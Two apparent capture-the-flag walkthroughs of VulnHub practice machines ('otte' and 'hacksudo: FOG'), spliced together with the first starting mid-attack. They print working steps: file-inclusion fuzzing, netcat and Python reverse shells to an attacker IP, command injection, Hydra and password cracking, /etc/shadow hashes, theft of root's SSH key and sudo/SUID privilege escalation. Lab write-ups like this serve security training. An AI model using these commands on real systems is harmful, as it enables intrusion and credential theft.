wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 20
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 3 L 6 W 74 Ch "command"
Visit shell.php, run reverse shell code.
http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash
In another terminal, listen to port 1234, and get reverse shell.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59386.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgrade to interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@otte:/var/www/html$
In /home/thomas, get nightmare.txt.
www-data@otte:/home/thomas$ ls -la
ls -la
total 100
drwxr-xr-x 4 thomas thomas 4096 May 20 09:46 .
drwxr-xr-x 5 root root 4096 May 16 12:34 ..
-rw------- 1 thomas thomas 50 May 20 09:46 .Xauthority
lrwxrwxrwx 1 thomas thomas 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 May 15 12:12 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 May 17 14:42 .bashrc
drwxr-xr-x 3 thomas thomas 4096 May 15 14:00 .local
-rw-r--r-- 1 thomas thomas 807 May 15 12:12 .profile
drwx------ 2 thomas thomas 4096 May 17 09:35 .ssh
-rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
-rw-r--r-- 1 thomas thomas 122 May 15 14:56 nightmare.txt
-rwxr-xr-x 1 thomas thomas 93 May 17 09:15 shell.php
www-data@otte:/home/thomas$ cat nightmare.txt
cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
www-data@otte:/home/thomas$
Download important_file to local machine, check file content, the header is corrupted.
less important_file
important_file (press RETURN)
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
...
Search IDHR on google, looks like it's an PNG file. Replace XXXX's with a normal PNG file header.
head important_file
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8 x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f ......5.g.w=0.|.
Use cyberchef to render the PNG file, get a QR code.
[image-20210523212230214.png]
Render the QR code, get an link.
[image-20210523212429143.png]
Visit https://eqrcode.co/a/SVxQdM, get password of thomas.
Login ssh as thomas, check sudo.
thomas@otte:/home/laetitia$ sudo -l
Matching Defaults entries for thomas on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thomas may run the following commands on otte:
(laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *
Run simpler.py, when ask for IP, input shell command.
thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $("/bin/bash")
laetitia@otte:~$
This shell is not interactive, we need to run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.
[image-20210523220810457.png]
Check sudo again, as laetitia.
laetitia@otte:~$ sudo -l
sudo -l
Matching Defaults entries for laetitia on otte:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User laetitia may run the following commands on otte:
(cedric) NOPASSWD: /usr/bin/w3m
Use php to create a temporary http server on local machine, use w3m visit port 80, and spawn a shell.
sudo -u cedric /usr/bin/w3m http://192.168.56.150
Then run !/bin/bash, now we are user cedric.
[image-20210523221401950.png]
In /home/cedric/.ssh, upload id_rsa.pub.
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
Then we can login ssh as cedric.
Check sudo again.
cedric@otte:~$ sudo -l
Matching Defaults entries for cedric on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cedric may run the following commands on otte:
(ALL : ALL) NOPASSWD: /usr/bin/mmwatch
After check code of mmwatch, we can read id_rsa of root through mmwatch.
sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"
Then we can login ssh as root.
root@otte:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
otte
root@otte:~# ls -la /root
total 40
drwx------ 4 root root 4096 May 20 10:30 .
drwxr-xr-x 18 root root 4096 May 15 12:07 ..
lrwxrwxrwx 1 root root 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 May 15 12:13 .local
-rw------- 1 root root 1500 May 15 13:23 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 May 16 14:02 root.txt
drwx------ 2 root root 4096 May 16 13:24 .ssh
-rw-r--r-- 1 root root 173 May 15 12:19 .wget-hsts
-rw------- 1 root root 100 May 20 10:30 .Xauthority
Vulnhub hacksudo: FOG Walkthrough
Vulnhub hacksudo: FOG Walkthrough
https://www.vulnhub.com/entry/hacksudo-fog,697/
Scan open ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
...
43195/tcp open mountd 1-3 (RPC #100005)
45469/tcp open nlockmgr 1-4 (RPC #100021)
48871/tcp open mountd 1-3 (RPC #100005)
52195/tcp open mountd 1-3 (RPC #100005)
Scan folders/files of port 80, download dict.txt.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
Found username hacksudo at cms page.
[image-20210518224756405.png]
Bruteforce ftp.
hydra -l hacksudo -P dict.txt -t 32 192.168.56.100 ftp -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100 login: hacksudo password: hackme
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Download secr3tSteg.zip.
ftp> ls -la
200 PORT command successful
150 Connecting to port 43827
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 33 33 389 May 7 03:34 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 13:57 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -la
200 PORT command successful
150 Connecting to port 46515
drwxr-xr-x 2 0 0 4096 May 6 13:57 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 0 0 63 May 5 11:07 authors.txt
-rw-r--r-- 1 0 0 0 May 6 11:36 installfog
-rw-r--r-- 1 0 0 1573833 May 6 19:24 secr3tSteg.zip
Bruteforce password of zip.
fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip
PASSWORD FOUND!!!!: pw == fooled
Download the SoundStegno provided at source code of index1.html.
[image-20210519103824772.png]
Decrypt the wav file unzipped from secr3tSteg.zip, get hints.
python3 /opt/SoundStegno/ExWave.py -f ./hacksudoSTEGNO.wav
...
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.
[image-20210518224455131.png]
Login cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.
[image-20210518224924381.png]
Check content of the txt file.
[image-20210519104218050.png]
Copy cmsmsrce.txt to shell.php, visit the following address in browser.
http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
At the same time, listen at port 1234 in another terminal, get reverse shell.
[image-20210519104609411.png]
Find suid files.
find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
Use look to read /etc/shadow.
www-data@hacksudo:/home$ look '' /etc/shadow
look '' /etc/shadow
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
...
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::
Crack password of isro.
john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt fish-0 | 0 [23:32:44]
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)
Log in ssh as user isro. Check sudo, but it's rabbit hole.
ssh isro@192.168.56.100
isro@192.168.56.100's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
In /home/isro/fog, found a executable file of user root.
isro@hacksudo:~$ ls -la
total 40
drwxr-x--- 5 isro isro 4096 May 18 12:16 .
drwxr-xr-x 6 root root 4096 May 8 12:25 ..
-rw------- 1 root isro 41 May 18 11:44 .bash_history
-rw-r--r-- 1 isro isro 0 May 5 14:05 .bash_logout
-rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
drwx------ 3 isro isro 4096 May 5 14:09 .gnupg
drwxr-xr-x 3 isro isro 4096 May 5 14:11 .local
-rw-r--r-- 1 isro isro 0 May 5 14:05 .profile
-r-------- 1 isro isro 33 May 6 14:31 user.txt
-rw------- 1 isro isro 54 May 18 12:16 .Xauthority
isro@hacksudo:~$ cd fog
isro@hacksudo:~/fog$ ls -la
total 3700
drwxr-xr-x 2 isro isro 4096 May 13 05:06 .
drwxr-x--- 5 isro isro 4096 May 18 12:16 ..
-rwxr-xr-x 1 root isro 16712 May 12 13:46 fog
-rw-r--r-- 1 isro isro 0 May 6 14:30 get
-rwxr-xr-x 1 isro isro 69368 May 6 14:29 ping
-rwxr-xr-x 1 isro isro 3689352 May 6 14:30 python
Run fog, get python shell, check id, it's root.
isro@hacksudo:~/fog$ ./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os;os.system("id");
uid=0(root) gid=1003(isro) groups=1003(isro)
0
Spawn a root shell.
>>> import pty;pty.spawn("/bin/bash");
┌──(root💀hacksudo)-[~/fog]
└─# id;hostname
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo
┌──(root💀hacksudo)-[~/fog]
└─# c
bash: c: command not found
┌──(root💀hacksudo)-[~/fog]
└─#
┌──(root💀hacksudo)-[~/fog]
└─#